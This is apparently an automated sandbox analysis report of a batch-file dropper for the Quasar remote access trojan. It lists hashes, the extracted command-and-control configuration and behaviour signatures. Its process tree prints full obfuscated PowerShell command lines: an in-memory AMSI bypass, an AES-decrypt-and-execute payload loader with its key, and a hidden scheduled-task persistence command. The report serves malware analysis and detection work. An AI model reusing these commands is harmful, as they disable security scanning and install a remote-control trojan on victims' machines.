Analysis
-
max time kernel
300s -
max time network
281s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
14-05-2024 21:43
General
-
Target
Fix.bat
-
Size
513KB
-
MD5
a84be587721ab2558489178539f283e6
-
SHA1
5a48f5c98f7366d13f371965c19c98a5754bd90b
-
SHA256
32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
-
SHA512
c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
SSDEEP
12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-AidubAN29rBfWYM23w
Attributes
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Blocklisted process makes network request 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 15 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7dcccc0d-d4f6-4a3a-93d0-ba0a8a12dbb4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f56ec715-b702-4eea-b848-10c1df4d903f}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wOGAyguphIJy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zDrOzdIcDevpRr,[Parameter(Position=1)][Type]$NSFqPkvNoU)$NtYlyEhdOMS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+'P'+'ub'+[Char](108)+''+'i'+''+'c'+''+','+'S'+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+','+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$NtYlyEhdOMS.DefineConstructor(''+[Char](82)+'T'+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+'id'+[Char](101)+''+[Char](66)+'ySi'+'g'+','+[Char](80)+''+'u'+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zDrOzdIcDevpRr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');$NtYlyEhdOMS.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+','+''+'H'+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+'N'+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'al',$NSFqPkvNoU,$zDrOzdIcDevpRr).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $NtYlyEhdOMS.CreateType();}$hmbOfFVupfNNg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+'cro'+'s'+'o'+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$SVcqGmjufytRJA=$hmbOfFVupfNNg.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+'l'+''+'i'+''+'c'+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WIYAzyMPhvyKvMspjxB=wOGAyguphIJy @([String])([IntPtr]);$ZLfVfGLNMgrAYWovZKdjgd=wOGAyguphIJy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nlFxdJnAiXW=$hmbOfFVupfNNg.GetMethod(''+'G'+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+'e'+'l'+''+[Char](51)+'2'+'.'+'dl'+[Char](108)+'')));$GrEUoFfbchCjKi=$SVcqGmjufytRJA.Invoke($Null,@([Object]$nlFxdJnAiXW,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+'a'+''+[Char](114)+'y'+[Char](65)+'')));$nWusEhMvsRBzqbuvu=$SVcqGmjufytRJA.Invoke($Null,@([Object]$nlFxdJnAiXW,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+'lP'+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$mMvgGbv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GrEUoFfbchCjKi,$WIYAzyMPhvyKvMspjxB).Invoke(''+[Char](97)+'msi'+[Char](46)+''+[Char](100)+''+'l'+'l');$fNQaWpWuGeClKNnLO=$SVcqGmjufytRJA.Invoke($Null,@([Object]$mMvgGbv,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'er')));$XVgVKQrqUx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nWusEhMvsRBzqbuvu,$ZLfVfGLNMgrAYWovZKdjgd).Invoke($fNQaWpWuGeClKNnLO,[uint32]8,4,[ref]$XVgVKQrqUx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fNQaWpWuGeClKNnLO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nWusEhMvsRBzqbuvu,$ZLfVfGLNMgrAYWovZKdjgd).Invoke($fNQaWpWuGeClKNnLO,[uint32]8,0x20,[ref]$XVgVKQrqUx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FHruHigOlgxe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BfVPxLknYdCZXy,[Parameter(Position=1)][Type]$mTWCmWJbAb)$DpLWphIRgJu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+'Pub'+[Char](108)+'ic'+[Char](44)+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+'o'+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DpLWphIRgJu.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+'N'+'a'+'m'+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$BfVPxLknYdCZXy).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');$DpLWphIRgJu.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+',H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'ySi'+[Char](103)+',N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rtu'+'a'+'l',$mTWCmWJbAb,$BfVPxLknYdCZXy).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $DpLWphIRgJu.CreateType();}$gguxYfouFUIZA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+'e'+[Char](109)+''+'.'+''+'d'+'ll')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n'+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+'t'+''+'i'+''+[Char](118)+''+'e'+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'ds');$NIfCQCPgnJIWEu=$gguxYfouFUIZA.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+'cA'+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HdBNpmiUIToNiLmqwrI=FHruHigOlgxe @([String])([IntPtr]);$FgvMyaEpPfVFLVDDlgpbDO=FHruHigOlgxe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cbANXBmCPUK=$gguxYfouFUIZA.GetMethod('G'+'e'+''+'t'+''+[Char](77)+''+[Char](111)+'d'+'u'+'l'+[Char](101)+'Ha'+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+'e'+''+[Char](108)+''+'3'+''+'2'+'.d'+[Char](108)+''+'l'+'')));$lusCXZmZdFgLxT=$NIfCQCPgnJIWEu.Invoke($Null,@([Object]$cbANXBmCPUK,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'Li'+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$bojbCmYSPWlgcnBjb=$NIfCQCPgnJIWEu.Invoke($Null,@([Object]$cbANXBmCPUK,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+'e'+''+'c'+'t')));$QFFxANT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lusCXZmZdFgLxT,$HdBNpmiUIToNiLmqwrI).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+'.'+''+'d'+''+[Char](108)+''+'l'+'');$dhPoytLIniJINIhYF=$NIfCQCPgnJIWEu.Invoke($Null,@([Object]$QFFxANT,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+'e'+[Char](114)+'')));$zODodlykBT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bojbCmYSPWlgcnBjb,$FgvMyaEpPfVFLVDDlgpbDO).Invoke($dhPoytLIniJINIhYF,[uint32]8,4,[ref]$zODodlykBT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dhPoytLIniJINIhYF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bojbCmYSPWlgcnBjb,$FgvMyaEpPfVFLVDDlgpbDO).Invoke($dhPoytLIniJINIhYF,[uint32]8,0x20,[ref]$zODodlykBT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+'7'+'7'+''+'s'+''+'t'+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Fix.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Fix.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_937_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_937.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_937.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_937.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_937.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_937.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7usMH6hRYQjS.bat" "7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
